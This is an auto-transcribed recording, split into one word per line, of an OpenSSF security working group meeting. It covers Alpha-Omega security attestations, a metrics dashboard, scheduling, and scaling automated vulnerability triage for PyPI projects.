►
A
C
A
B
C
E
B
Offended
by
that
they
haven't
told
me
so
we're
gonna
keep
doing
that.
E
Yeah
I
I
have
told
you
the
story
about
the
telephone,
haven't
I.
A
E
A
B
E
Don't
think
it
took
them
that
long,
but
I
mean
it
was
a
social
Challenge
and
and
Bell
lost
I
think
it
was
Edison
who
wanted
hello
or
hi
and
Edison
wanted
a
Hoy
Hoy,
and
we
don't
do
it.
E
E
F
Ibm
got
a
pass
because
Unix
started
to
change
the
landscape,
but
at
T
had
a
natural
monopoly
and
to
make
a
long
story
short
after
fighting
it
for
several
years,
18t
finally
capitulated
and
said.
Okay,
we
want
to
be
a
long
distance
company
because
that's
where
the
money
is,
we
still
want
to
make
big
pieces
of
Hardware.
You
know
old,
switching
infrastructure,
Western
Electric
Lucent,
and
we
still
want
to
do
research
in
the
labs.
F
F
Some
smart
reporter
in
the
back
of
the
room,
said
what
about
that
wireless
technology
that
they've
been
trialing
in
Chicago
and
up
until
that
point,
the
most
prolific
Wireless
technology
was
called
Smurf
specialized,
Mobile
Radio,
you
know
the
press
to
talk,
hey
Charlie
bring
some
more
parts
to
the
job
site
over
which
is
more
analogous
to
having
a
large
fam
antenna
broadcasting
a
large
area,
but
they've
actually
been
in
trials
with
early
first
generation
Cellular
in
Chicago,
but
at
T
and
even
their
expensive
Consultants
told
them
that,
oh
by
the
year
2000
there
might
be
a
million
people
using
this
newer
stuff.
F
So
when
the
reporter
asked
about
it,
the
government
didn't
know
what
they
were
talking
about,
the
executive
from
a
t
and
the
government
turned
away
from
the
podium
for
a
second.
What's
this
about?
Well,
it's
this
and
well!
Is
it
more
like
local
or
long
distance
and
the
executive
answered
honestly?
Well,
it's
more
like
you
know:
local,
a
local
call.
Well,
that'll,
go
over
to
the
Bells,
okay,
fine!
F
That's
how
they
literally
turned
back
to
the
podium
and
announced
that
ATT
gave
away
the
intellectual
property
and
rights
to
what
became
amps.
The
advanced
mobile
phone
system
and
I
had
to
buy
it
back
some
12
15
years
later,
for
billions
of
dollars.
B
All
right
awesome
welcome
everybody
to
the
October
26th,
identifying
security
threats.
Working
group
meeting
I
will
be
your
host.
Is
there
anybody
new
who
has
not
been
here
before
I?
Don't
think
so
yeah?
B
Is
gonna
be
happening
on
October
28th?
This
is
this
Friday
in
two
days,
so
you
are
welcome
to
join
and
participate.
Look
at
the
open,
ssf
Slack
channel
for
for
office
hours
for
details
and
I
haven't
seen
an
invite
for
it.
So
I
will
I'll
ping
the
channel
and
see
what
what
how
how
the
open
ssf
folks
joined
because
I
think
for
the
for
the
projects
that
would
that
would
attend
they
they
needed
to
fill
out
and
register
so
we'll
also
see
if
anybody
registered.
E
B
B
It
is
possible
that
that
will
be
delayed,
we're
not
going
to
push
it
out
until
those
important
things
get
done
so,
but
best
case
it'll
be
it'll,
be
on
this
coming
Tuesday
Tuesday,
the
security
review,
video
walkthrough.
This
is
another
channel
I
think
it's
called
Security
review,
video
Welcome
that
will
be
happening
on
November
7th.
So
this
is
next.
B
Like
a
week
and
a
Monday
from
now
everybody's
welcome
to
join,
we
will
be
taking
we'll
we'll
take
an
open
source
project
and
we
will
interactively-
and
you
know,
live,
do
a
screw
review
of
it.
So
we'll
run
tools
and
triage
and
kind
of
do
everything
we
can
in
an
hour
we're
going
to
choose
a
pretty
small
package
to
do
this.
B
It
will
not
be
published
until
we're
confident
that
we
haven't
found
any
interest
in
zero
days,
because
we
want
to
get
those
fixed
before
we
publish,
but
in
all
likelihood
it'll
be.
You
know,
we'll
we'll
publish
it
and
it'll
be
also
something
that
we'll
iterate
on.
So,
if
you're
interested
in
participating,
please
ping
the
channel
or
just
join
on
November
7th.
It's
on
the
open,
ssf.
A
B
Let's
join
the
LF
member
Summit
I,
believe
that
is
November
like
11
to
15
or
I
might
have
the
dates
wrong,
but
it's
I'm.
F
Monday's
Arrival
Day,
Tuesday,
Keynotes
and
sessions
and
then
more
sessions
on
Wednesday
and
Thursday.
The.
B
Week
of
November
7th
cool,
thank
you
and
then
finally,
the
virtual
summative
maintainers
of
Maintenance
of
critical,
open
source
software,
which
I
think
we
need
a
short
name
for
it.
It
looks
like
that
is
going
to
be
I
believe
we
said
January
for
that.
C
The
date
has
not
been
finalized,
yet
I
mean
look
at
those
two
finalize
it
yesterday,
but
people
are
in
Uconn
and
other
events,
so
we
didn't
have
the
meeting
yesterday,
but
I
mean
there's
no
reason
for
it
to
be
not
being
mid-January.
We
just
want
to
analyze
the
data
we'll.
B
Do
stop
finalizing
day,
probably
mid-January
foreign,
so
I
want
to
go
into
project
updates
for
folks
that
we
have
who
can
talk
to
these
things?
Security
reviews
I
would
for
mere
I
need
to
connect
with
him
offline
for
a
couple
things
so
I'll
try
to
get
an
update
from
him.
I
haven't
seen.
You
know
this
seems
to
be
just
be
kind
of
steady
new
reviews
dribbling
in
here
and
there
for
Alpha
Omega.
B
November
1st
we'll
give
them
kind
of
the
full
update
and
including
the
stuff,
that's
in
the
annual
report,
but
we're
looking
at
oh
I,
don't
know
if
I
should
announce
this
yeah
sure.
Why
not
so
we
we
have
our
first
hire,
although
I'm
not
gonna,
say
their
name
because
reasons
yeah
okay,
so
we
we
were
able.
So
so
we
have
a
first
software
engineer.
B
Hire
super
super
super
excited
to
have
this
person,
starting
hopefully
in
the
middle
of
November,
working
on
Omega
and
the
kind
of
the
the
tooling
and
orchestration
and
whatnot
that
we're
going
to
need
to
find
lots
of
vulnerabilities
as
part
of
that,
and
that
this
is
I
would
love
to
get
input
on
this
I
posted
a
note
in
the
alpha
omega
slack
channel
and
I.
Think
on
a
on
a
GitHub
issue
in
in
Alpha
Omega.
B
Basically,
I
would
like
I
would
like
to
be
able
to
publish
assertions
that
security
validation.
Work
has
been
completed
against
an
open
source
project
in
a
way
that
is
consumable
via
a
policy
driven.
You
know
whatever
Bob
thing
and
have
that
be
as
streamlined
and
automated
as
possible.
B
So
the
same
way
that
so
we
did
experiment
about
six
months
ago,
I
think
most
of
you
aware,
but
what
we
read
a
bunch
of
tools
against
a
piece
of
Open
Source
when
they
came
back
clean,
meaning
no,
no
code,
ql
findings,
no
sem
grep
findings:
it
was
reproduced,
sorry,
it
was
yeah,
it
was
reproducible
and
no
public
vulnerabilities
I
think.
Maybe
there
was
maybe
one
more
one
more
check,
but
a
finite
number
of
shacks
when
they
all
came
back
totally
clean.
B
Then
we
asserted
that
through
a
Security
review,
that
you
know
text
that
we
a
template
that
we
stuck
out
and
published
and
that's
great
for
reading
it.
But
it's
not
it's
not
awesome
for
consuming
it.
So
what
we
were
thinking
is
doing
something.
In
fact,
I
should
just.
B
So
imagine
a
world
where
we
run
lots
of
tools
against
a
piece
of
Open
Source
and
for
each
and
hand
waving
on
like
the
lower
level
designs
of
this.
But
let's
say
for
each
tool:
if
it
spit
out,
you
know
it
can
have
some
sort
of
output.
It
can
either
like
find
one
or
more
issues,
not
find
any
issues
and
maybe
fail
to
run
or
something.
B
Provide
enough
information
out
to
a
consumer
so
so
that
they
can
say
was
left
pad
1.3
like
what
do
we
know
about
it.
B
Well,
we'll
know
that
it
was
scanned
by
seven
different
tools
and
that
no
critical
findings
were
were
discovered
or
it
was
scanned
and
three
critical
findings
popped
out,
but
after
triage
they
were
all
false
positive,
so
the
net
was
was
Zero
and
lots
of
other
it
was.
It
was,
you
know,
reproducible
it.
B
It
I
mean
in
theory,
like
it,
had
these
scorecard
values
at
this
point
in
time,
and
anything
else
like
that,
and
you
push
this
into
what
I
was
probably
going
to
be
an
in
total
assertion
or
an
in
Total
Access
I'm
using
assertion
and
attestation
get
the
two
words
confused,
but
a
statement
of
that
fact,
and
then
you
know
it's
signed
and
all
that
stuff
and
then
and
then
you
as
a
consumer
can
just
say
you
know.
B
Look
in
my
you
know
my
my
lock
file,
my
list
of
Open
Source
I
use
the
metric
dashboard
for
left
pad
and
you
can
see
the
stuff
and
you
can
say,
apply
my
policy
and
my
policy
says:
I
can
only
use
projects
that
have
had
two
or
more
static
analysis
tools,
run
against
it
in
the
past
year
and
have
had
zero
critical
findings
pop
out
of
that
or
whatever.
What
whatever
you.
Whatever
you
want
to
express
as
part
of
your
your
policy,
language.
B
I
think
that
was
that's
like
the
elevator
pitch
here:
I've
lots
of
open
questions
on
like
how
this
would
actually
work,
but
I
want
to
get
open
this
up
for
thoughts
and
whatnot
and
please
you
know.
In
addition,
you
obviously
we
can
talk
now,
but
if
we
can
throw
comments
here,
so
it's
more
public
over
there.
That
would
be
awesome
too.
Any
thoughts.
C
So
I'm
wondering
like
who's
gonna,
be
producing
these
things.
Is
it
going
to
be
like
produced
by
like
Alpha
Omega
like
the
Omega
side,
doing
the
scans
and
producing
these
attestations?
That,
or
is
this
going
to
be
like
run
by
the
maintainers
and
they
will
have
somehow
or
some
process
of
like
automatically
generating
these
things?.
B
So
I
think
it
needs
to
be
run
by
it.
That's
right,
it
shouldn't
be
Omega
only
I,
don't
think
it
should
be
maintainers
themselves.
It.
B
Be
a
trusted
third
party,
so
so
so
so
the
The
Trusted
third
party
is
asserting
to
you,
the
consumer,
that
this
artifact
that
a
this
was
like,
Anonymous
maintainer
created
is
trustworthy
or
you
know
the
level
of
trustworthiness
of
that
thing,
so
you
can't
attest
it
yourself,
because
you're
biased
and
while
yes
I,
would
imagine
Omega
would
produce
lots
of
these
use.
A
consumer
of
this
would
be
able
to
say
I.
Don't
trust
anything
these
these!
B
You
know,
Omega
people
are
doing
I'm
only
going
to
trust
things
that
some
other
third
party
provide.
So
I
would
want
this.
This
attestation
assertion
database
to
be
publicly
like
I
guess
anybody
can
push
to
it
and
then
it's
on
the
consumption
that
you
filter
out
the
one,
the
the
trusted
roots
that
that
you'd
want
to
respect
and
and
and
value.
C
B
I
I
definitely
think
it.
It
has
a
place
to
be
shown
in
some
way
within
definitely
the
and
Jay
and
Christina,
or
everybody
look
feedback
on
on
where
this
could
fit
in
the
metric
dashboard
I
think
scorecard.
Could
it
I
mean
I?
It
feels
like
it
fits
so
that
would
be
interesting
building
it
into
the
underlying,
like
npm
install
dash
dash
policy
equals
strict,
like
that,
might
make
sense
or
just
a
separate,
a
separate
tool.
So
you
do
you
know
you
know
npm
validate
my
thing
policy
equals
strict.
B
You
know
that,
would
you
know
I
I'm,
I,
I
think
coming
up
with
a
giant
building.
This
database
of
assertions,
I
think
is,
is
going
to
be
relatively
easy
building.
The
policy
evaluator
is
also
pretty
easy,
I
think
you're
right,
which
touched
on,
which
is
like
the
actual
consumption
of
this,
showing
that
this
has
value
and
like.
B
But
what
about
like?
What
would
it?
What
would
an
end
consumer
actually
do
with
this
information
so
I'm
a
developer
I
want
to
use
I
want
to
use
Foo,
so
I
do
policy
check
my
my
thing
of
Foo
and
it
says
two
tools
of
two
tools
have
been
run
against
it.
It's
not
reproducible
there's
one
potentially
moderate
level
security
issue,
but
it
hasn't
been
triage.
B
G
E
Okay,
I
mean
I
I,
I
I
could
tell
you
what
would
be
next
and
you
know
given
that,
but
no,
but
nothing
that
was
told
to
me
ahead
of
time
would
say
well
how
long
have
they
had
to
have
had
how
much
time
have
they
had
to
triage
if
they
just
got
that
report
yesterday,
goodness
gracious,
you
know
there
are
very
few
organizations
that
can
guarantee
24
now
our
analysis,
but
if
it's
been
sitting
in
their
queue
for
nine
months,
I
would
worry
a
lot.
E
You
know
you
know
it's
not,
reproducible,
not
good
Not
Unusual.
On
the
other
hand-
and
this
is
something
I
mentioned
to
the
dashboard
folks-
if
it
used
to
be
reproducible
and
now
it's
not
or
you
know
it's
not
only
is
it
not
reproducible,
but
it
says
it's
version
101
and
the
latest
version
in
the
source
code.
E
Repo
is
one
zero
zero
that
looks
more
like
somebody
broke
into
the
package
repo,
you
know
so
you
know
so
I
in
in
all
of
this
you're
you're
trying
to
get
an
estimate
of
how
much
risk
am
I
taking
on-
and
you
know
things
that
suggest
especially
unusual
amounts
of
risk.
I
think
is
what
you're
looking
for
primarily
we've
had
a
discussion,
for
example,
about
single
person
projects.
I
do
think
that
single
person
projects
by
definition
are
riskier.
E
Are
they
unusual,
no
they're,
incredibly
common
case
so
saying
I'll,
never
use
a
single
person
project
isn't
really
reasonable.
It's
not
clear
how
how
I
mean
by
itself
you're
not
getting
a
lot
of
risk.
It
is
a
risk
indicator,
it's
not
by
itself
a
high
risk,
but
it's
a
high
risk
if
it's
combined
with
other
indicators
like.
A
E
G
Hello,
so
yeah
I
I
had
a
question
when
it
comes
to
the
triage
the
filtering
you're
talking
about
anybody
can
write.
So
do
we
really
know
how
to
filter,
knowing
that
you
know
who
runs
the
tools?
What
tools
exactly
it
was.
Is
that
the
genuine
you
know
Alpha
Omega
tool
or
is
that
some
kind
of
you
know
Fork
that
somebody.
B
Well,
so
so
I
I,
I
I,
imagine
the
the
schema.
The
the
schema
would
need
to
be
expressive
enough
to
convey
what
was
actually
done.
So
on
one
hand,
you
could
just
say:
I
ran
a
tool.
On
the
other
hand,
you
could
say:
here's
like
the
command
line
and
the
environment
and
here's
the
link
to
its
actual
output
or
it's
a
containerized
thing
that
should
reproduce
the
same
results
or
you
know
you
could
go
anywhere
on
that
Spectrum,
but
I
I
I.
B
Think
at
the
end
of
the
day,
though,
the
the
actual
assertion
is
the
private
key
of
the
entity.
That's
making
the
assertion
that
is
putting
their
reputation,
saying
that
this
thing
is
authentic,
I,
don't
think,
there's
a
way
to
get
around
that
I
mean
I.
Suppose
you
could
have.
You
could
have
a
thing
where,
where
you
only
trust
assertions,
if
you
have
identical
content
from
two
or
more
parties,
you
could
do
like
multi-party.
B
You
know
assertions
but
I
I
think
it
would
still
be
up
to
you,
the
consumer
or
proxy,
for
you,
who's,
making,
like
kind
of
judgment,
calls
here
to
say
that
that
you
know
these,
these
three
entities
are
top
level
trust
trustworthy
to
make
assertions
and
by
default
the
tooling,
like
only
you
know,
cares
about
what
they
say.
B
Or
you
know
you
could
make
up
your
own
root
and
and
do
a
thing
but
I,
don't
think
I
think
it
should
be
a
relatively
open
system
that
multiple
parties
can
contribute
to.
Multiple
parties
can
consume
from,
but.
G
There's
no
deals
that
makes
sense.
Yeah
I,
think
that
makes
sense.
I
I
agree.
It
has
to
be
rich
enough
in
content.
So
you
know
the
context
in
which
you
know
it
was
run,
which
version
of
the
tool
exactly
was
used
and
so
on,
right,
yeah
and
then
it's
the
consumers
of
the
responsibility
to
decide
who
they
want
to
trust.
As
always.
C
B
Cool,
if
you
do
have
more
thoughts,
please
throw
them
in
the
issues.
B
I
think
that
this
well
I
mean
I'm
I'm,
hoping
to
be
able
to
make
progress
here
in
the
next
like
two
to
three
months
to
have
something
that
we
can
kind
of
show
and
argue
about
in
in
you
know,
concrete
terms,
let's
see
so
assimilation,
I,
don't
have
any
new
information
on
this.
It's
just
just
bandwidth
on
my
side,
I
I
still
think
it
that
it's
a
reasonable
idea.
B
I
should
take
this
to
I.
Think
I
promised
hack
that
I
would
take
it
to
them
in
the
next.
B
You
know
two
months
or
so
assimilation
was
the
the
open
source
security
ecosystem
Sim,
where
we
monitor
new,
publish
events
and
look
at
various
indicators
of
risk
around
the
metadata,
not
not
not
the
content
but,
like
you
know
this
is
you
know
so
on
cryptocurrency
or
mining
cryptocurrency
when
it's
installed
or
you
know,
dumping
environment
variables
over
to
paste
spin
or
you
know
whatever
things
like
that
so
more
to
come
there
if
you're
interested
in
participating
in
this,
you
know
we
can,
we
can
move
it
forward
at
the
rate
of
participation.
B
Basically,
security,
insights,
I,
don't
see
Luigi,
so
we'll
we'll
hold
off
on
that.
I
already
talked
about
the
screw
walk
through
a
metrics
dashboard.
We
have
a
bunch
of
time
to
talk
about
this,
so
there
anything
new
that
you
folks.
Let's
talk
about
with
metrics
dashboard
and
there's
the
the
metric
dashboard
thing
stuff,
yeah.
E
I
I
think
it's
a
it's
key
to
note
that
I
mean
there's
a
whole
different
say
focused
on
this,
so
if
you're
interested
in
that
go
to
its
meetings,
but
for
this
group
The
quick
summary
is
we've
had
some
we've
talked
together,
there's
some
various
things.
I
think
one
of
the
next
steps
is
basically
identifying
potential.
E
Metrics
users
we
already
at
least
made
a
first
cut
identifying
users
what
they
need,
and
you
know,
and
then
I
after
that
I
think
the
goal
is
to
have
a
some
sort
of
very
simple
rough
idea
of
what
it
would
look
like,
and
you
know,
based
on
the
metrics
open,
ssf.org,
LFX
security,
scorecards,
best
practices
badge
many
of
the
chaos.
Many
other
sources
of
things
have
done.
This
kind
of
thing.
D
Cool
and
just
just
just
to
add
on,
let
me
know
because
I,
so
we
also
discussed-
and
this
is
this-
is
a
way
along
with
what
David
was
just
talking
about
the
type
of
metrics
and
whether
or
not
the
pep
I
had
my
notes
up
in
front
of
me.
Just
now
now,
they're,
not
there
anymore,
the
type
of
metrics
and
whether
or
not
we're
focusing
on
projects,
products
or.
D
Products,
projects
and
process
and
processes
also
perhaps
collaborating
with
other
working
groups
as
well,
so
understanding
taken
from
critical
projects,
working
group
and
ID
and
iding
projects
that
have
the
largest
impact
and
and
perhaps
focusing
metrics
on
on
these
in
in
the
in
the
beginning
right
and
then
you
know
so
if
we
talked
about
that
as
well,
we
also
discussed
a
few
a
few,
a
few
housekeeping
items
talking
about
guac
as
well,
about
getting
data
and
all
that
kind
of
stuff.
D
A
few
other
things
here.
We
handled
some
issues
around
meeting
times
some
of
the
meeting.
There
was
some
meeting
time
confusion
so
right,
along
with
what
David
said,
get
involved
in
the
meeting
time
should
all
be
be
accurate.
Now,
so
we
shouldn't
have
that
those
kind
of
issues,
those
kind
of
issues
there.
E
Let's
see
I
think
I,
probably
I'll
check
to
find
the
next
meeting
I.
D
Think
the
next
meeting
is
the
28th,
so
on
Friday
Friday
will
be
the
next
meeting.
So
look
for
that
on
the
on
the
on
the
on
the
calendar
that
should
be
updated
properly.
I,
don't
see
it,
you
don't
see
it.
Okay.
Let
me
check
here
make
sure.
H
D
B
Let's
I
have
I
have
two
different
meetings
at
the
same
time
for
the
same
topic
so.
A
H
E
I
also
I
also
have
an
open,
ssf
Sig
risk
meeting.
That
was
I
believe
what
happened
is
that's
created
when
you
log,
when
you.
A
E
With
with
the
LFX
registration.
H
H
H
The
one
that
you
got
through
our
register,
an
individual
link,
is
going
to
show
up
like
say
back
11
Easton
and
then
the
other
one
is
going
to
show
up
as
12
Easton
the
public
one.
E
D
So
it
should
this,
the
beating
should
happen
at
the
12
at
the
12
p.m.
Eastern
nine
A.M
Pacific!
That
meeting
should
happen,
the
other
one,
the
eight,
what
the
8
A.M
or
11
A.M
on
the
18th
that
one
isn't
it
and
I
think
that
so
so
that
speaks
to
what
Christine
was
saying.
The
LFX
platform
might
not.
The
the
calendar
might
not
have
been
adjusted
to
meet
daylight
savings
time
right.
E
Exactly
and
and
and
I
just
I
suspect,
the
challenge
is,
if
you
say,
like
East
Coast
meet
time,
that's
one
time,
but
if
you
set
it
as
a
UTC
time
yeah
and
it
will
not,
then
it.
D
A
E
D
E
I
would
add
one
more
thing:
I
mean
there's
a
number
of
topics
discussed,
but
I
think
one
of
the
other
challenges
was
exactly
what
are
you
evaluating
and
the,
and
there
were
multiple
possible
answers
to
that.
You
could
evaluate
a
project.
You
could
evaluate
a
project
as
represented
by
a
specific
repo.
E
You
could
evaluate
a
package
or
you
could
evaluate
a
specific
version
of
a
package
and
you
know,
and
and
basically
you
can
kind
of
see
the
links
flowing
the
other
way
if
you're
looking
at
a
version
of
a
package.
You're
also
ended
up
in
evaluating
a
package
in
general,
and
we
hopeful
links
to
a
source
code
reap
where
that
package
is
generated
from
and
then
there's
questions
you
can
answer
there.
E
It's
not
clear
to
me
what
the
MVP
needs
to
be,
but
I
I
think
it
needs
to
at
least
cover
packages
and
and
project
repos,
but
you
know
that's
to
be
determined.
A
E
E
E
Yeah
that'll
be
that
would
be
interesting
to
enforce,
though
I
just
got
recently
some
I've,
my
apologies
for
for
inside
baseball,
but
some
proposed
legislation
for
the
U.S
Department
of
Defense,
and
they
want
them
to
look
and
be
aware-
and
you
know
they
want
to
only
accept
components-
software
with
components
with
no
known
vulnerabilities
that
are
exploitable.
Now,
it's
the
our
exploitable
part,
that's
critical,
because
obviously
a
vast
number
of
cases
just
because
there's
a
known
vulnerability.
B
E
E
I
think
that
trying
to
expect
that
hey,
we're
just
gonna
push
we're
slamming
the
brakes
and
not
accept
the
software.
We've
been
accepting
for
40
50
years
and
we're
going
to
suddenly
change
everything
yeah
it's
it's
the
speed
of
change
that
I
think
is
unreasonable,
not
the
destination.
E
C
B
Which
kind
of
goes
sorry
goes
back
to
that
that
angle,
where
it's
not
not
even
I,
think
the
biggest
benefit
is
that
you
take
something
from
an
what
is
an
unknown,
unknown,
I
guess
to
a
known
known,
I'm,
sorry,
but
but
like
a
package
that
you
have
no
information
on
right,
know
that
has
a
vulnerability
is
actionable
because
you
can
decide
like
I'm,
not.
B
Evaluated
and
is
has
some
data
to
suggest
that
it
is
safe
while
not
actionable,
meaning
you
wouldn't
do
anything
with
this.
You
should
sleep
better,
knowing
that,
all
of
that
you
know
you
of
all
of
your
of
your
entire
supply
chain,
eighty
percent
of
it-
you
should
worry
very
little
about,
and
this
twenty
percent.
You
should
worry
more
on,
as
opposed
to
having
to
distribute
your
worry
across
all
of
them
right.
B
Cool
is
there
anything
else.
I
would
like
to
talk
about.
C
So
Michael
I
would
like
to
talk
about
so
we've
been
working
on
these
like
a
separate
project
with
you
on
the
Pi
Pi
repository
scanning
and
basically
like
we
did
some
experiments.
We
submitted
some
results.
We
were
trying
to
figure
out
what
are
the
ideal
ways
of
of
basically
communicating
the
results
to
the
you
know,
maintainers
and
have
them
fixed
and
I
mean
not
necessarily
vulnerability,
but
at
least
to
be
security
hardening.
Just
just
for
that.
C
So
at
some
point,
like
I
would
like
to
like
get
some
guidance
on
like
what
we
should
do
next
or
how
can
we
move
this
forward?
I
mean
this
is
somewhat
tangentially
related
to
the
to
the
automated
Security
reviews
like
this
could
be
part
of
like
automatic,
even
like
attestation,
etc.
Those
could
be
generated,
and
that's
why
I
mean
it's
it's
Financial
related,
but
at
some
point
maybe
I
don't
know
whether
it
is
the
time.
C
But
at
some
point
we
need
to
discuss
about
like
how
we
can
move
that
that
particular
project
I.
B
So
so,
just
to
clarify
the
particular
question:
this
is
this.
So
for
everybody
else.
The
scenario
is
you
want
to
report
you
you,
you
have
a.
You,
have
a
magic
black
box
that
generates
what
you
believe
to
be
high
quality,
vulnerability
abilities,
but
a
lot
of
them.
So
you
want
to
automate
to
the
extent
possible
or
minimally
person
person
time
in
getting
these
out
to
authors,
and
what
we've
all
learned
is
that
the
perception
of
this
kind
of
drive-by
bot
driven
hey
a
tool,
found
a
thing.
B
So
you
should
definitely
like
stop
everything
and
fix
it.
Maintainers
often
react
viscerally
to
that,
and
and
is
there
a
better.
C
In
the
small
experiment
that
we
did,
they
were
we
submitted
25
automated
actually
manually
created,
but
they
appeared
to
be
automated,
but
they
were
all
manually
created,
but
there
were
only
two
projects
where
which
had
negative
reactions,
and
one
of
them
was
because
of
a
mistake
that,
like
our
guy
who
was
doing
the
stuff
that
was
doing
doing
it,
it
was
like
yeah.
He
was
not
following
the
right
protocol,
so
it
was
not
that.
C
But
what
we
also
understood
and
part
of
that
fact
is
so
out
of
the
25
that
we
submitted
I.
Think
12
got
even
like
Mars
within
like
two
or
three
days,
so
that's
a
high
amount
of
of
bugs
that
were
immediately
accepted
and
and
so
on
now
the
actual
data
that
I've
shared
before
and
so
so
there's
some
value
to
that.
In
the
end,
we
would
like
it
to
have
a
something
like
you
can
call
it
an
attestation.
C
You
could
call
it
a
quality
gate
but
like
that,
and
so
that's
why
I
was
asking
about
like
who's
going
to
be
consuming
these
these
additions
I
mean
down
the
line
in
in
distant
future.
Maybe
we
can
have
like,
let's
say
for
any
project
or
any
library
to
be
in
Pi
Pi.
It
has
to
pass
through
attestation
by
somebody
or
it's
just
not
featured
there,
I
mean
so
we
we
create
a
gate
for
for
and
that
way
we
collectively
upgrade
upgrade
the
process.
C
And
then
this
could
be
a
part
of
of
that
that
vision.
So
what
we
would
like
to
do
now,
but
at
the
same
time
like
about
this
drive
by
fixing
or
or
suggestion
thing,
there's
also
politics
that
is
involved,
which
is
like,
if,
let's
say
our
company
opened,
a
factory
suddenly
comes
up
and
and
does
that
it
might
sound
like
a
PR
Campaign,
which
people
proceeded
like
the
one
per
one
or
two
places
where
it
was.
C
It
was
passive
as
a
peer
coming
which
it
wasn't,
but
if
it
is
coming
from,
let's
say
an
open
SSA
for
IPI
or
some
other
authority,
then
that
it's
that
collaboration
or
that
stamp
of
approval,
that's
also
important,
because
then
people
trusted
more
and
and
it's
it's
just
like
how
human
nature
is
yeah,
reacting
people.
So
these
are
the
places
where
we
need
to
discuss
and
figure
out
like
how
we
can
move
this
thing
ahead
at
its
minimum.
C
What
we
really
need
is
to
scale
this
right
now
we
are
scanning
like
200
projects.
We
want
to
scale
it
to
like
as
you
as
the
goal
of
Omega
is
to
do
it,
10,
000
and
and
Beyond
like
why
not
430
000
of
IPI,
so
so
that
that's
kind
of
like
the
and
in
order
to
do
an
experiment
of
that
scale
or
or
extent
that
would
need
some
support
on
on
infra
or
something
to
scale
this.
B
B
C
Definitely
it's
definitely
up
Omega
camp
and
in
further
to
build
it
can
as
well
apply
to
Alpha
it
doesn't
matter,
so
the
big
vision
is
to
actually
basically
build
them,
build
a
dashboard
of
some
sort
where,
in
the
background
we
run
the
Alpha
Omega
2
Chain,
we
also
run
icr.
We
are
on
some
other
pool
that
also
comes
in
all
the
results
are
consumable
together.
All
of
them
come
to
the
dashboard
to
a
maintainer.
C
He
because
the
the
result
is
highly
concentrated
at
that
point
is
feasible
for
the
for
that
person
to
actually
triage
and
and
then
from
that
we
generate
the
pull
request.
Then
the
software
maintenance
come
in
and
fix
that
and
collaboratively.
We
do
rinse
and
repeat
on
that
project
after
project
and
so
on.
So
it's
not
real
related
to
really
us.
C
The
the
big
picture
that
I
actually
see
is
to
I
I
mean
run
both
the
the
the
docker
image
for
the
22,
something
tools
that
the
Omega
has
as
well
as
our
tool
as
well
as
some
other
in
future,
but
create
this
framework
where
these
These
are
reported
back
to
the
maintainers
and
then
they
fix
it.
And
we
have
a
process
of
tracking
that
as
well
yep.
C
B
So
it'd
be
really
hard
for
me
to
say
that
Omega
shouldn't
that
that
Omega
shouldn't
play
a
role
here.
We
did
start
out
building
a
dashboard
for
for
a
mega
to
glob.
Together
all
these
results,
so
you
could
triage
it
efficiently
and
all
that
stuff,
and
so
so
that
that
project
exists
and-
and
it's
maybe
for
50
done.
A
B
Probably
maybe
another
two
months
of
work
to
to
get
it
in
in
good
shape,
and
but
we've
also
said
that
that
we,
we
trust
ourselves
less
to
run
an
operational
service
that
has
that
collects
and
stores
and
manages
zero
days
at
scale
than
we
do
on
just
buying
some
high-end
workstations
that
haven't
folks
will
work
locally.
B
We
can
still
run
the
website
locally,
so
they
have
a
nice
experience
but
like
so
that
was
kind
of
our
our
thinking
on
why
we
we
took
our
foot
off
the
gas
for
the
for
that
that
triage
portal,
but
I
I,
so
so
there
was
a
doc
that
we
wrote
on
basically
saying
whenever
a
we
described
it
as
a
commercial
entity,
comes
to
us
and
says:
hey
we
want
to.
We
want
to
work
with
you,
Alpha
Mega,
like
we
have.
We
have
a
really
super
sharp
tool
we
want
to.
B
We
want
to
use
it
the
way
that
we
did
this
for
code
ql
and
for
Snick
is
we
just
have
them
integrated
into
the
into
the
docker
container,
so
we
run
them
locally.
You
know
they.
They
are.
You
know
for
for
Snick
we
have
an
API
key
that
that
they
gave
us.
So
we
can
run
that
if
you
don't
have
the
API
key,
it's
not
going
to
run
things
like
that
for
services
that
we
would
not
be
able
to
run
ourselves
so
things
that
are
you
know
and
just
generically.
B
You
know
a
vendor
run
thing
to
be
able
to
consume
results
at
scale,
so
we
haven't.
So
there
was
a
there's.
A
security
researcher
in
Europe,
somewhere
I
brought
a
bike
on
his
name,
but
he
he
developed
another
static
analysis
tool
for
Python
and
he
ran
it
across
everything
and
he
had
this
like
40
gigabyte,
Json,
you
know
output.
You
know
that
he
that
he
shared
and
because
at
that
scale
like,
what's
he
gonna
do
with
that,
like
you
can't,
you
know,
go
through
that.
B
So
what
I
would
like
to
have
omega,
develop
muscle
for
is
consuming
results
at
scale
and
operationalizing
the
triage
and
and
everything
else
we
we
met
with
GitHub
security
lab
last
week.
I
think
it
was
last
week
talking
about
their
approach
and-
and
you
know
they
do
both
vertical
so
so
they'll
look
at
for
a
particular
project.
Look
for
all
the
vulnerabilities
and
triage
them
all
and
then
report
out,
but
they
found
just
better
success
in
going
horizontal
where
they
look
for
just
vulnerability.
B
Class
Acts
across
you
know
hundreds
or
thousands
of
projects
and
then
try
to
you
know
because
I
I
think
the
the
presumption
was
that
your
the
analyst
is
more
focused
when
looking
at
one
one
particular
type
of
issue
across
lots
of
projects,
then
every
issue
across
one
either
way,
though
I
think
I,
think
it'll
make
sense
like
I,
don't
see
any
reason
why
Omega
should
not
consume
like
from
open
refractory
and
do
that
last
mile
triage
reporting,
because
at
the
end
of
the
day
the
vulnerability
gets
fixed
like
everybody
in
the
chain
gets
a
point.
B
So
you
know
we
like
don't
need
to
generate
the
vulnerability
ourselves
from
our
own
rules
like
you
know
that
we
don't
care
so
I
I
feel
like
that
that
that
makes
sense.
C
And
and
fundamentally
we
don't
have
any
problem
even
connecting
with
the
docker
container
and
so
on.
So
that's
not
the
hard
problem
here.
The
heart
problem
and
the
interesting
one
and
the
one
that
is
good
for
the
world
is,
is
really
how
do
we
manage
the
triage
and
bring
it
to
the
maintenance?
How
quickly
can
this
be
done
and
and
maybe
like
how
isolatedly
can
this
be
done
as
well?
Maybe
this
is
not
public.
C
Maybe
this
is
just
a
private
dashboard,
but
then
access
by
by
Alpha
Omega
people,
and
then
we
do
a
coordinated
disclosure
through
that
everything
doesn't
need
to
be
public
right,
so
I
mean,
but
but
these
are
the
stuff
that
I
would
like
to
discuss
and
